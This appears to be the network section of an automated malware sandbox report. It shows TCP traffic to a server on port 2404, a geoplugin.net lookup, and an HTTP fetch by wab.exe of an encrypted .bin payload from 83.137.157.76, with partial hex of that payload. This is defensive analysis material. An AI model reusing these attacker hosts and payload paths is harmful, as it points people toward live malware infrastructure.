                                                          Mar 28, 2024 08:02:03.630548954 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630562067 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630577087 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630584002 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.630609989 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.630695105 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.630728006 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632061005 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632226944 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632241011 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632253885 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632262945 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632291079 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632385015 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632400990 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632411957 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632433891 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632594109 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632606983 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632630110 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632762909 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632774115 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632780075 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632802963 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.632903099 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632915974 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.632936001 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.633488894 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633528948 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.633579969 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633630037 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633663893 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.633682966 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633699894 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633747101 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.633763075 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633832932 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.633894920 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.642029047 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.680402994 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.680459023 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.680494070 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.740705013 CET8049739178.237.33.50192.168.2.4
                                                          Mar 28, 2024 08:02:03.740890026 CET4973980192.168.2.4178.237.33.50
                                                          Mar 28, 2024 08:02:03.741812944 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741827965 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741858959 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741872072 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741879940 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.741894007 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741925955 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.741950035 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741964102 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741975069 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741987944 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.741988897 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742002010 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742016077 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742043972 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742047071 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742058992 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742083073 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742098093 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742108107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742140055 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742151022 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742165089 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742178917 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742201090 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742207050 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742247105 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742257118 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742269039 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742280960 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742294073 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742306948 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742335081 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742341995 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742398024 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742434978 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742456913 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742505074 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742544889 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742546082 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742599010 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742640018 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742655993 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742705107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742743969 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742749929 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742800951 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742841005 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.742855072 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742916107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742954969 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.742955923 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743036032 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743051052 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743065119 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743077040 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743078947 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743103981 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743119001 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743156910 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743171930 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743185043 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743196011 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743213892 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743218899 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743237019 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743248940 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743261099 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743304014 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743316889 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743330002 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743343115 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743369102 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743391037 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743405104 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743417978 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743429899 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743454933 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743457079 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743469954 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743480921 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743493080 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743504047 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743516922 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743537903 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743541956 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743554115 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743580103 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743602991 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743617058 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743643045 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743658066 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743671894 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743683100 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743695974 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743721962 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743741035 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743755102 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743767977 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743792057 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743793964 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743829012 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743835926 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743848085 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743907928 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743907928 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743937969 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.743968010 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.743973017 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744024038 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744060040 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744072914 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744086027 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744122982 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744136095 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744158983 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744195938 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744204998 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744285107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744296074 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744307995 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744321108 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744326115 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744334936 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744347095 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744352102 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744364023 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744369030 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744400024 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744420052 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744435072 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744446039 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744457960 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744468927 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744492054 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744496107 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744504929 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744520903 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744541883 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.744545937 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744559050 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.744594097 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.746426105 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746439934 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746469021 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746481895 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746500015 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.746512890 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.746520996 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746534109 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746556997 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746572018 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.746578932 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746602058 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746618032 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.746648073 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746659994 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746682882 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.746722937 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746735096 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.746761084 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.749097109 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.749111891 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749125957 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749138117 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749150991 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749155998 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.749176979 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.749182940 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749196053 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749222040 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.749238014 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749252081 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749264002 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749269962 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.749300957 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.749320984 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749334097 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749346972 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749365091 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.749385118 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.749417067 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.751111984 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751127958 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751154900 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751171112 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.751203060 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751245022 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.751250982 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751293898 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751327991 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751332998 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.751348972 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751386881 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.751399994 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751413107 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751456022 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751460075 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.751513958 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.751563072 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.756180048 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.756191969 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.756205082 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.756227016 CET240449738162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:03.756238937 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.756266117 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:03.765299082 CET497382404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:09.458132029 CET240449737162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:09.460625887 CET497372404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:09.636137962 CET240449737162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:39.470904112 CET240449737162.251.122.89192.168.2.4
                                                          Mar 28, 2024 08:02:39.472234011 CET497372404192.168.2.4162.251.122.89
                                                          Mar 28, 2024 08:02:39.645895004 CET240449737162.251.122.89192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 28, 2024 08:02:02.261436939 CET5463453192.168.2.41.1.1.1
                                                          Mar 28, 2024 08:02:02.358290911 CET53546341.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Mar 28, 2024 08:02:02.261436939 CET192.168.2.41.1.1.10x5777Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Mar 28, 2024 08:02:02.358290911 CET1.1.1.1192.168.2.40x5777No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • 83.137.157.76
                                                          • geoplugin.net

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.44973683.137.157.76807824C:\Program Files (x86)\Windows Mail\wab.exe
                                                          TimestampBytes transferredDirectionData
                                                          Mar 28, 2024 08:01:59.486421108 CET179OUTGET /gDuOvMZLyhtbvV140.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                          Host: 83.137.157.76
                                                          Cache-Control: no-cache
                                                          Mar 28, 2024 08:01:59.688487053 CET1286INHTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Wed, 27 Mar 2024 11:40:06 GMT
                                                          Accept-Ranges: bytes
                                                          ETag: "27c8df833b80da1:0"
                                                          Server: Microsoft-IIS/10.0
                                                          Date: Thu, 28 Mar 2024 07:01:59 GMT
                                                          Content-Length: 494656
                                                          Data Raw: 3d a2 64 16 ef b5 6e d3 cd ce f4 76 b7 79 f6 62 a5 6f 84 bc f3 eb 84 9f 26 e3 e7 c9 d8 ab 48 72 1d 26 a7 3c 3e ff 9b 94 83 d2 74 14 64 21 b3 f8 8c 57 0f cb 56 ae de 4f ba 9c f6 d0 15 97 26 0c 61 ab bd ab a2 51 39 c5 f6 78 d6 7b 1f 72 c3 95 95 52 cc 1a 57 5b 47 92 5e 79 30 b8 a8 f7 ab b0 92 93 55 0e 6f 80 ef 20 8e 70 15 61 1f b1 38 cb 4c f7 25 e2 d6 d1 fd 3f 08 ab 3d 69 3a ff d5 be 51 a6 81 a9 0c 0b 6f 29 61 b0 86 27 17 ae 43 5b 32 f5 79 7b e4 90 3d d1 6c 51 cc 1f 49 30 9e b4 82 af 55 a1 79 bd bc 90 d1 d1 58 62 fc 4d c8 19 26 05 2a 78 fc f0 98 54 5e 86 f6 e1 67 95 dc 9f a1 52 f8 e8 b0 e4 07 95 12 69 30 4e d9 35 bf 37 05 c9 b5 05 b6 5b 53 30 06 f9 c5 cc 0e c8 65 1b 82 a0 f9 9c af ad e5 cf 77 19 f5 dc fd 19 ba 30 5a 2b c3 57 52 dc dd be 80 7d 93 40 cb 59 43 3a f2 2b e9 5f a4 e5 ba 03 2f 60 8f b6 8f e9 8f fc 98 f9 86 11 f3 14 6c c3 c3 86 73 10 b9 0c a3 92 08 1f 9c 94 79 72 b9 3d 49 6a b9 ad 8a 21 b6 bb 86 5b 07 97 b5 bd e8 1f 88 9b 9c 92 45 93 05 38 78 56 2b 4f de dd d1 ca e8 5d cc 3c 47 d3 f7 27 ee c7 0a 16 03 0d 91 7c f6 8d dd 24 30 37 b6 8a 37 af 19 58 a8 9f ff 8f cc f8 1f 41 cf 78 2c d5 40 28 7a 76 50 e8 0a 3c 32 a7 3f 5d 20 fe a3 7f 5d d6 ab a6 7a 95 c9 71 17 83 00 d5 51 63 b9 49 9b 62 f0 6f 2d 50 ed 93 20 47 c9 9b 60 01 0b f5 1d d4 24 dc 31 63 87 92 1a f5 9c 22 ee 5b a6 fd 1a 5b 03 45 b3 cb 13 2a 68 bd 7a 6f 68 f9 60 7e c1 24 46 06 a6 38 a8 4c f5 b6 b4 45 63 f4 0b e0 69 15 f3 90 07 e6 ab d2 3b e6 48 12 be f5 71 df fb c7 01 9b a9 74 fe e6 b8 98 c9 1c e3 7a ea 94 7d d9 6c c8 72 90 a8 2c c1 a1 e6 3e 82 59 2e d8 5a fd e1 bc e6 70 dc 63 7b d5 90 42 54 49 32 2b 70 a9 a2 a1 82 99 2d 49 bd a5 da 16 89 8f e7 25 90 b8 4f e8 3e 58 44 de 99 1e fe 6b 1d 64 14 73 18 a4 b3 b4 97 ec 3e f8 40 9e 66 b4 fe 51 81 42 88 74 78 79 16 72 e1 1d e0 5f 99 f5 b1 6e 3b 0e e8 e8 52 e1 d3 0f c5 35 ed f8 b0 d2 85 68 fc db d1 24 b9 73 c3 da d1 0e 8e 73 f1 09 51 9e ec 1d d7 5b 58 56 ff 67 f6 97 d9 eb 5b 8e 2b 1c 24 3a 35 72 5f 8a 4f a7 43 1c 1c 92 25 69 24 fa b6 aa 70 40 c8 4c 40 cb d4 48 46 6c 2f b9 24 7c 2f 0c 64 e9 b6 0b f6 59 2e 93 cb 79 91 fc 74 81 94 06 07 c4 63 4e 7a 83 d6 84 4a 3e 67 a2 f6 5f 98 7f 51 99 bd a7 e7 0f 1d 21 c0 ab dd c3 46 e0 0a 60 ff e7 79 d8 0e 65 d6 33 18 e0 49 34 dc df 15 54 8a d7 1d ca a2 96 1c 60 30 d4 5d 8e c1 a1 2c f1 c2 4b 2b ce b1 39 06 53 50 cc 35 5f 9a 6f be 35 54 fd 80 8c f8 d0 f7 23 c6 ce 6e e9 63 9e 80 9c ee 22 ba 0c 55 d5 92 b4 5f 69 a4 a9 b3 f0 0c 50 bd d4 a4 b9 a5 f3 1d cb 78 a3 57 fb 43 f5 8e a1 5c 8a ac 16 1c ab cc 0e 66 6f a2 a6 6c d0 3c d2 89 a5 6f 68 90 5f 71 95 69 23 b2 a2 00 8d 89 fc 33 d3 ea ca 50 ad e9 2e b4 93 8f aa 64 0e ce 50 5f 68 f3 4a 36 e0 e5 66 a9 c6 c9 d3 eb 0c 7e 05 cf ba 20 b1 38 bc 26 b0 d3 df 20 57 1a 12 d7 32 c7 ad 0a 14 d8 fa 7c 51 98 02 b4 b2 11 b7 1b 7d c9 63 f4 32 90 d9 e1 4b 61 13 c1 40 63 ce 7d 1d f8 c3 f0 18 9b f7 89 22 26 c5 63 64 83 06 18 0e 5b ce 3a 71 eb 92 3a 05 b5 f4 5b 11 f1 81 f4 6d 76 6a c9 7e 17 1d 51 46 28 67 3a 39 ef c5 f8 b4 83 26 78 4f 52 90 2d 9a e2 91 52 83 92 3d 57 39 93 e6 d3 0f 26 ff 75 a9 c7 d3 8e 0f 20 da 9a 19 58 dc 1d aa 75 53 78 a5 72 9a f9 e5 5f e0 fa 1c e0 bc 49 3d 2a 20 37 a8 fd 6d c5 60 44 8e 55 43 72 fc 8b
